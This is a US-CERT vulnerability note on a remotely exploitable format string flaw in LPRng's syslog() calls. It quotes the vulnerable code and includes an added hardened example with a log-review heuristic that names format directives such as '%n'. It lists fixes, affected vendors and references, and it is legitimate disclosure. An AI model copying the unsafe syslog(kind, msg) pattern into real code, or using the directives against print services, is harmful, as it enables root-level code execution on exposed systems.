US-CERT Vulnerability Notes Database
Vulnerability Note VU#382365

LPRng can pass user-supplied input as a format string parameter to syslog() calls

Overview

LPRng, a popular replacement for the BSD lpd printing service, contains at least one software defect known as a "format string vulnerability" which may allow remote users to execute arbitrary code on vulnerable systems. Such code will probably run with root-level privileges.

I. Description

LPRng, the "next generation" of print-service management software now packaged in several open-source operating system distributions, omits the format string argument in at least two calls to the syslog() function. When the format string is omitted, user-supplied data is passed directly as the format argument to a susceptible *snprintf()-style call. This may allow remote users with access to the printer port (port 515/tcp) to supply format-string directives that overwrite arbitrary addresses in the printing service's address space. Such overwriting can cause segmentation violations, leading to denial of printing services, or lead to the execution of arbitrary code injected by other means into the memory segments of the printer service.

The vulnerable calls in this case occur in the following section of code:

LPRng-3.6.24/src/common/errormsg.c, use_syslog()
---
static void use_syslog(int kind, char *msg)
[...]
# ifdef HAVE_OPENLOG
        /* use the openlog facility */
        openlog(Name, LOG_PID | LOG_NOWAIT, SYSLOG_FACILITY );
        syslog(kind, msg);                    /* msg is used as the format string */
        closelog();

# else
    (void) syslog(SYSLOG_FACILITY | kind, msg);   /* same defect on this path */
# endif                                                 /* HAVE_OPENLOG */
[...]

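The following is an added example, not LPRng's own code, showing the hardened call pattern (the message is always passed as an argument to a fixed "%s" format) beside a small heuristic that counts printf-style conversion directives in a request line, which a defender can use when reviewing syslog output for the "bad request line" entries described below. It assumes a POSIX syslog(); the function names and the sample strings are constructed for this illustration.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <syslog.h>

/* Hardened form of use_syslog(): the caller-controlled message is never
 * the format string, so directives inside it are logged literally. */
static void use_syslog_fixed(int kind, const char *msg)
{
    syslog(kind, "%s", msg);
}

/* Render msg through a fixed format and report whether it survived
 * unchanged. Returns 1 when the output equals the input, 0 otherwise
 * (including truncation). */
static int renders_literally(const char *msg)
{
    char buf[256];
    int n = snprintf(buf, sizeof buf, "%s", msg);
    return n >= 0 && (size_t)n < sizeof buf && strcmp(buf, msg) == 0;
}

/* Heuristic for log review: count printf conversion directives in s,
 * e.g. "%n", "%300$n", "%.168u". A literal "%%" is not counted. */
static int count_format_directives(const char *s)
{
    int count = 0;
    const char *p = s;
    while ((p = strchr(p, '%')) != NULL) {
        const char *q = p + 1;
        if (*q == '%') { p = q + 1; continue; }      /* escaped percent */
        /* flags, width, precision and positional "N$" */
        while (isdigit((unsigned char)*q) || strchr("$.-+ #*", *q) != NULL)
            q++;
        /* length modifiers */
        while (*q != '\0' && strchr("hlLqjzt", *q) != NULL)
            q++;
        if (*q != '\0' && strchr("diouxXeEfFgGaAcspn", *q) != NULL)
            count++;
        p = q;
    }
    return count;
}
```

A request line scoring several directives, especially "%n" with positional arguments, is a strong indicator of an exploitation attempt against the unfixed use_syslog().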

Sample syslog entries from exploitation of this vulnerability:

Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line

II. Impact

A remote user may be able to execute arbitrary code or cause a denial of service. The privileges the malicious code would have depend on whether the print daemon drops its root privileges before or after the calls to the vulnerable syslog() functions.

III. Solution

Upgrade to a non-vulnerable version of LPRng (3.6.25), as described in the vendor sections below.

Disallow access to printer service ports (typically 515/tcp) using firewall or packet-filtering technologies.

Systems Affected

Vendor                          Status            Date Updated
Apple Computer Inc.             Not Vulnerable    11-Dec-2000
Compaq Computer Corporation     Not Vulnerable    11-Dec-2000
Debian                          Vulnerable        7-Dec-2000
FreeBSD                         Vulnerable        11-Dec-2000
Hewlett-Packard Company         Not Vulnerable    11-Dec-2000
IBM                             Not Vulnerable    11-Dec-2000
Microsoft Corporation           Not Vulnerable    11-Dec-2000
NetBSD                          Vulnerable        11-Dec-2000
OpenBSD                         Not Vulnerable    7-Dec-2000
Patrick Powell                  Vulnerable        5-Dec-2000
Red Hat Inc.                    Vulnerable        27-Jan-2003
SGI                             Not Vulnerable    12-Dec-2000
SuSE Inc.                       Not Vulnerable    5-Dec-2000
The SCO Group (SCO Linux)       Vulnerable        5-Dec-2000
Trustix                         Vulnerable        4-Dec-2000

References

https://www.kb.cert.org/vuls/id/382365
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
http://www.securityfocus.com/bid/1712
http://www.ciac.org/ciac/bulletins/l-004.shtml
http://www.ciac.org/ciac/bulletins/l-025.shtml
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=17756
http://www.securityfocus.com/archive/1/85002
http://archives.neohapsis.com/archives/bugtraq/2000-09/0293.html
http://xforce.iss.net/static/5287.php
http://www.redhat.com/support/errata/RHSA-2000-065.html
http://www.calderasystems.com/support/security/advisories/CSSA-2000-033.0.txt
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:56.lprng.asc
http://www.trustix.net/download/Trustix/updates/1.1/RPMS/LPRng-3.6.24-1tr.i586.rpm
http://lists.suse.com/archives/suse-security/2000-Sep/0259.html
http://lists.debian.org/debian-security-0011/msg00212.html
http://rpmfind.net/linux/RPM/redhat/7.0/updates/i386/LPRng-3.6.24-2.i386.html
http://www.egroups.com/message/lprng/6915
http://www.sans.org/newlook/alerts/port515.htm

Credit

Thanks to Chris Evans for making this code sample public.

This document was written by Jeffrey S Havrilla.

Other Information

Date Public: 09/25/2000
Date First Published: 12/04/2000 11:39:14 AM
Date Last Updated: 01/27/2003
CERT Advisory: CA-2000-22
CVE Name: CVE-2000-0917
US-CERT Technical Alerts:
Metric: 48.20
Document Revision: 41

Copyright 2000 Carnegie Mellon University